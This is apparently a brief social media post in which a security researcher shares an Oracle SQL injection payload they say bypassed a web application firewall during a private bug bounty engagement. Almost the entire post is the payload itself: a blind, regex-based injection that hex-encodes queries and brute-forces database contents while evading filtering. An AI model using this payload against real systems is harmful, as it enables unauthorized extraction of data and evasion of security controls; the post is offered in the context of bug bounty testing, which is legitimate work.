been a long time since last tweet, but here is a cool oracle SQLi payload that I recently used to bypass WAF on a private program:

1 or REGEXP_LIKE(DBMS_XMLGEN.GETXMLTYPE(utl_raw.cast_to_varchar2(HEXTORAW(‘{hex_query}’))),’>{brute_force}(.+)?@<‘,’i’)

Might do a write-up later